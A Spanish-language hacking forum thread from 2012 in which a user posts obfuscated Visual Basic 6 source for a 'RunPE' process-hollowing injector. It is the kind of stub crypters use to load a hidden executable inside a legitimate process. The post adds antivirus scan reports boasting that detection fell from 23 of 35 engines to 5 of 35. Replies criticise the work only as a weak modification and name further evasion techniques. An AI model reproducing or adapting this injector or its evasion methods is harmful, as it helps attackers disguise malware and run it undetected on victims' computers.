Runpe Mod 2º

« **en:** Diciembre 08, 2012, 10:54:12 pm »

Código: Visual Basic

Private Const F447LC9Xk As Long = &H10007
Private Const nW3PkSMii As Integer = 260
Private Const uAEcIoE8o As Long = &H4
Private Const eSzW7GQdf As Long = &H1000
Private Const HdsMEIXAx As Long = &H2000
Private Const bCd05T2O6 As Long = &H40
Private Declare Function CreateProcessA Lib "kernel32" (ByVal ZEuNODw1p As String, ByVal xMmicgUXB As String, ByVal nHQpEku43 As Long, ByVal QQ9E2IRO2 As Long, ByVal sf7Q6FWqz As Long, ByVal klh1LC0qa As Long, ByVal gpOq0ar08 As Long, ByVal lqV4QmVRl As Long, A9XZ0eH3c As IQVNXBW1K, XTbTNStC1 As IEuMTkEWN) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal fwp8F4lI1 As Long, UZLbQvjpN As Any, ADhSYKaSj As Any, ByVal rPTyCbu0O As Long, FRzhBrXZ3 As Long) As Long
Private Declare Function MJbmWIYXu Lib "kernel32" Alias "OutputDebugStringA" (ByVal vXeYdumBr As String) As Long
Public Declare Sub RtlMoveMemory Lib "kernel32            " (coZ2NvrKQ As Any, nxNRVRMkt As Any, ByVal W3EjZ6INJ As Long)
Private Declare Function CallWindowProcW Lib "user32               " (ByVal x9gbSV7nf As Long, ByVal Jwx0qigOk As Long, ByVal XMGKQAwG0 As Long, ByVal FR8tPRVTq As Long, ByVal rd7Ig24TO As Long) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal R9W0Wwz8O As Long, ByVal bEH39kATm As String) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal PSc4W5Rzh As String) As Long
Private Type l741Ghab0
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type
Private Type IQVNXBW1K
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type
Private Type IEuMTkEWN
fwp8F4lI1 As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type
Private Type Aa5vmpDi3
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type
Private Type Rk3tnkYdN
ContextFlags As Long
Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long
FloatSave As Aa5vmpDi3
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type
Private Type K2X0B2HMz
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type
Private Type DL1Kv8t0h
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type
Private Type kEnzAI55k
VirtualAddress As Long
Size As Long
End Type
Private Type KjpHYYXJc
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
' NT additional fields.
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As kEnzAI55k
End Type
Private Type SneHkJnLR
Signature As Long
FileHeader As DL1Kv8t0h
OptionalHeader As KjpHYYXJc
End Type
Private Type k9W00b66a
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type
Public Function okLbTkVkI(REbjcq5c4 As String, RfhiH80fE As Integer)
    Dim e2u96yIrC As Integer
    
    For e2u96yIrC = 1 To Len(REbjcq5c4)
        Mid(REbjcq5c4, e2u96yIrC, 1) = Chr(Asc(Mid(REbjcq5c4, e2u96yIrC, 1)) - RfhiH80fE)
    Next e2u96yIrC
    okLbTkVkI = REbjcq5c4
End Function
Sub cgjyTadqQ(ByVal sHost As String, ByRef ADhSYKaSj() As Byte, parameter As String)
Dim tFogYBkqM As Long
Dim Bu5wgPZne As K2X0B2HMz
Dim HIKRNiitq As SneHkJnLR
Dim UhtIMHdMW As k9W00b66a
Dim axquzdtgF As IQVNXBW1K
Dim lJYqbyJJM As IEuMTkEWN
Dim DukBkGsk0 As Rk3tnkYdN
axquzdtgF.cb = Len(axquzdtgF)
RtlMoveMemory Bu5wgPZne, ADhSYKaSj(0), 64
RtlMoveMemory HIKRNiitq, ADhSYKaSj(Bu5wgPZne.e_lfanew), 248
CreateProcessA sHost, okLbTkVkI(wVAxmxZR0("/", wVAxmxZR0(";", "2")), wVAxmxZR0("<", wVAxmxZR0(";", "5"))) & parameter, 0, 0, False, uAEcIoE8o, 0, 0, axquzdtgF, lJYqbyJJM
mOCsghEaW okLbTkVkI(wVAxmxZR0("|‚rzz", "8"), wVAxmxZR0("<", wVAxmxZR0(";", "5"))), okLbTkVkI(wVAxmxZR0("U{\uthw]pl~VmZlj{pvu", "3"), wVAxmxZR0(wVAxmxZR0(";", "2"), "5")), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("fy‚„…q|Q||sUˆ", wVAxmxZR0("<", "3")), wVAxmxZR0("8", wVAxmxZR0(wVAxmxZR0("<", "3"), "8"))), lJYqbyJJM.fwp8F4lI1, HIKRNiitq.OptionalHeader.ImageBase, HIKRNiitq.OptionalHeader.SizeOfImage, eSzW7GQdf Or HdsMEIXAx, bCd05T2O6
WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase, ADhSYKaSj(0), HIKRNiitq.OptionalHeader.SizeOfHeaders, 0
For tFogYBkqM = 0 To HIKRNiitq.FileHeader.NumberOfSections - 1
RtlMoveMemory UhtIMHdMW, ADhSYKaSj(Bu5wgPZne.e_lfanew + 248 + 40 * tFogYBkqM), Len(UhtIMHdMW)
WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal HIKRNiitq.OptionalHeader.ImageBase + UhtIMHdMW.VirtualAddress, ADhSYKaSj(UhtIMHdMW.PointerToRawData), UhtIMHdMW.SizeOfRawData, 0
Next tFogYBkqM
DukBkGsk0.ContextFlags = F447LC9Xk
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("LjyYmwjfiHtsyj}y", "4"), wVAxmxZR0(wVAxmxZR0("<", "3"), "8")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
WriteProcessMemory lJYqbyJJM.fwp8F4lI1, ByVal DukBkGsk0.Ebx + 8, HIKRNiitq.OptionalHeader.ImageBase, 4, 0
DukBkGsk0.Eax = HIKRNiitq.OptionalHeader.ImageBase + HIKRNiitq.OptionalHeader.AddressOfEntryPoint
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`raurnqP|{r…", "4"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread, VarPtr(DukBkGsk0)
mOCsghEaW okLbTkVkI(wVAxmxZR0("vp}ypw>=", "2"), wVAxmxZR0(";", "2")), okLbTkVkI(wVAxmxZR0("`sƒ{sbv€sor", "5"), wVAxmxZR0(";", "2")), lJYqbyJJM.hThread
End Sub
 Function mOCsghEaW(ByVal sLib As String, ByVal sMod As String, ParamArray Params()) As Long
Dim iaQt4rNA9 As Long
Dim cluYs57Jw(&HEC00& - 1) As Byte
Dim tFogYBkqM As Long
Dim xsYHO71Kp As Long
 
xsYHO71Kp = GetProcAddress(LoadLibraryA(sLib), sMod)
If xsYHO71Kp = 0 Then Exit Function
 
iaQt4rNA9 = VarPtr(cluYs57Jw(0))
RtlMoveMemory ByVal iaQt4rNA9, &H59595958, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
RtlMoveMemory ByVal iaQt4rNA9, &H5059, &H2: iaQt4rNA9 = iaQt4rNA9 + 2
For tFogYBkqM = UBound(Params) To 0 Step -1
RtlMoveMemory ByVal iaQt4rNA9, &H68, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
RtlMoveMemory ByVal iaQt4rNA9, CLng(Params(tFogYBkqM)), &H4: iaQt4rNA9 = iaQt4rNA9 + 4
Next
RtlMoveMemory ByVal iaQt4rNA9, &HE8, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
RtlMoveMemory ByVal iaQt4rNA9, xsYHO71Kp - iaQt4rNA9 - 4, &H4: iaQt4rNA9 = iaQt4rNA9 + 4
RtlMoveMemory ByVal iaQt4rNA9, &HC3, &H1: iaQt4rNA9 = iaQt4rNA9 + 1
mOCsghEaW = CallWindowProcW(VarPtr(cluYs57Jw(0)), 0, 0, 0, 0)
End Function
 
Public Function wVAxmxZR0(eczX16djq As String, cW5sVXYkV As Integer)
    Dim wlUnDp6U2 As Integer
    
    For wlUnDp6U2 = 1 To Len(eczX16djq)
        Mid(eczX16djq, wlUnDp6U2, 1) = Chr(Asc(Mid(eczX16djq, wlUnDp6U2, 1)) - cW5sVXYkV)
    Next wlUnDp6U2
    wVAxmxZR0 = eczX16djq
End Function

Date and Time: 12/8/2012 8:47:39 PM
File Name: Antes.exe
File Size: 16384 Bytes
MD5: 5d0e5cf9778421e9ad666d8d74a9e116
SHA1: e2d9ccc127170966fcf49725618a59d19df1cad7
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Trojan horse Injector.CBI
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.Qqlame

eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
G Data - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected SScope.Trojan.VBRA.3587
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)
BullGuard - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
Immunet Antivirus - Gen:Trojan.Heur.VP.bm0@aaAQLNmi
K7 Ultimate - Riskware ( ed2edfef0 )
NANO Antivirus - Clean!
VIPRE - VirTool.Win32.VBInject.gen.bp (v)

Report Generated by scanner.foromalware.com

Date and Time: 12/8/2012 8:43:12 PM
File Name: Final.exe
File Size: 20480 Bytes
MD5: f6f0b5f07628932200386c2e26522310
SHA1: f626a85cff0e06a7a722cad6917bc57fd5651c8a
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - Clean!
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Backdoor.Win32.Poison
Kaspersky Antivirus - Clean!
McAfee - Clean!
MS Security Essentials - Clean!
ESET NOD32 - Clean!
Norman - win32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Suspicious
A-Squared - Backdoor.Win32.Poison!IK
Quick Heal Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Clean!
Trend Micro Internet Security - Clean!
VBA32 Antivirus - Clean!
Vexira Antivirus - Clean!
Zoner AntiVirus - Clean!
Ad-Aware - Clean!
BullGuard - Clean!
Immunet Antivirus - Clean!
K7 Ultimate - Clean!
NANO Antivirus - Clean!
VIPRE - Clean!

Report Generated by scanner.foromalware.com

« **Respuesta #1 en:** Diciembre 10, 2012, 10:19:40 pm »

Esta bien que quieras aportar, pero te lo vuelvo a repetir, esto no es una mod bien hecha, una mod bien hecha es aquela en la cual se mejoran los runpes y se modifican sabiamente (CallApiByName,ZombieInvoke,etc).Lo que has hecho es darle a un boton

.
Gracias de todas formas.

-Saludos-

« **Respuesta #2 en:** Diciembre 10, 2012, 10:40:44 pm »

Cita de: k0ws en Diciembre 10, 2012, 10:19:40 pm

Esta bien que quieras aportar, pero te lo vuelvo a repetir, esto no es una mod bien hecha, una mod bien hecha es aquela en la cual se mejoran los runpes y se modifican sabiamente (CallApiByName,ZombieInvoke,etc).Lo que has hecho es darle a un boton .
Gracias de todas formas.

-Saludos-

+1 Un ejemplo de lo que no se debe de realizar

Esta es una respuesta al tema: Runpe Mod 2º en La plantilla. Códigos Fuentes

Runpe Mod 2º

K4RUN4

Runpe Mod 2º

k0ws

Re:Runpe Mod 2º

Snifer

Re:Runpe Mod 2º

Similar topics (1)